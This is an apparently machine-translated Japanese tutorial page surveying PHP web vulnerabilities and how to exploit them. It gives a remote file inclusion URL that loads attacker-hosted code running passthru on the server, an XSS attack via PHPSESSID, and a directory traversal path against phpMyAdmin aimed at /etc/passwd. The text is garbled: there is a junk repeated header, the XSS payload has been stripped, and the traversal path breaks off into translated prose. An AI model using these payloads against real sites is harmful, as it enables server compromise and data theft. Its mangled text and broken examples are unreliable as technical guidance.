ホームページ >php教程 >php手册 >PHP スクリプト Web サイトの脆弱性の概要

PHP スクリプト Web サイトの脆弱性の概要

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBオリジナル
2016-06-21 09:15:521184ブラウズ

スクリプト

現在のネットワーク セキュリティから判断すると、誰もが最も懸念し、最も危険にさらされている Web ページの脆弱性は ASP であるはずです。この点に関しては、Xiaozhu が専門家であるため、私は何も言えません。しかし、PHP の観点から言えば、そこにあります。も非常に深刻なセキュリティ上の脆弱性の問題ですが、この分野の記事はあまりありません。ここでは、PHP ページの関連する脆弱性について簡単に説明します。ファイルの脆弱性、スクリプト コマンド実行の脆弱性、ファイル リークの脆弱性、SQL インジェクションの脆弱性などが含まれます。もちろん、COOKIE スプーフィングなどのいくつかの一般的なテクノロジについては、ここでは説明しません。それでは、これらの脆弱性を悪用する方法を 1 つずつ分析していきます。まず、この脆弱性は、PHP に特有のものであると言えます。外部から提供された悪意のあるデータを処理するため、リモートの攻撃者がこれらの脆弱性を悪用できるようになります。この脆弱性により、Web プロセス権限を使用してシステム上で任意のコマンドを実行できるようになります。例を見てみましょう: a.php に次のようなコードがあるとします。 include($include."/xxx.php");

?>

ここで $include は通常設定されているパスですが、自分でパスを構築することで攻撃の目的を達成することができます。たとえば、a.php?include=http://web/b.php を送信すると、この Web は攻撃に使用するスペースです。もちろん、b.php は攻撃に使用するコードです。 b.php の passthru("/bin/ls /etc"); このようにして、意図的な攻撃を実行できます (注: Web サーバーは PHP コードを実行できません。そうしないと問題が発生します。関連する詳細については、「PHP プログラムの一般的な脆弱性を攻撃する方法」を参照してください。

次に、スクリプト コマンド実行の脆弱性を見てみましょう。ユーザーが送信した URI パラメータのフィルタリング 悪意のある HTML コードを含むデータを送信すると、クロスサイト スクリプティング攻撃が引き起こされ、ユーザーの機密情報が取得される可能性があります。例も示します。PHP 4.3.1 より前の PHP 透過バージョンのindex.php ページには、PHPSESSID の十分なフィルタリングがありません。このようなコードを通じて攻撃の目的を達成できます。

http://web/index .php?PHPSESSID= ">スクリプトでは、ユーザーの機密情報を取得する関数を構築できます。この点に関する脆弱性は比較的少ないです。PHP Transparent に加えて、PHP-Nuke、phpBB、PHP Classifieds、PHPix、Ultimate があります。 PHP ボードなど

次に、ファイル漏洩の脆弱性を見てみましょう。この脆弱性は、ユーザーが送信したパラメータのフィルタリングが不十分であることが原因で、ディレクトリ トラバーサル攻撃を実行して機密情報を取得する可能性があります。最近発見された phpMyAdmin を例に挙げてみましょう。phpMyAdmin では、ユーザーが送信した「what」パラメータが完全にはフィルタされません。リモート攻撃者は、複数の「../」文字を含むデータを送信できます。 WEB ROOT 制限を適用し、WEB 権限を持つシステム上のファイル情報を表示します。たとえば、export.php?what=../../../../../../etc と入力します。パスワード




声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。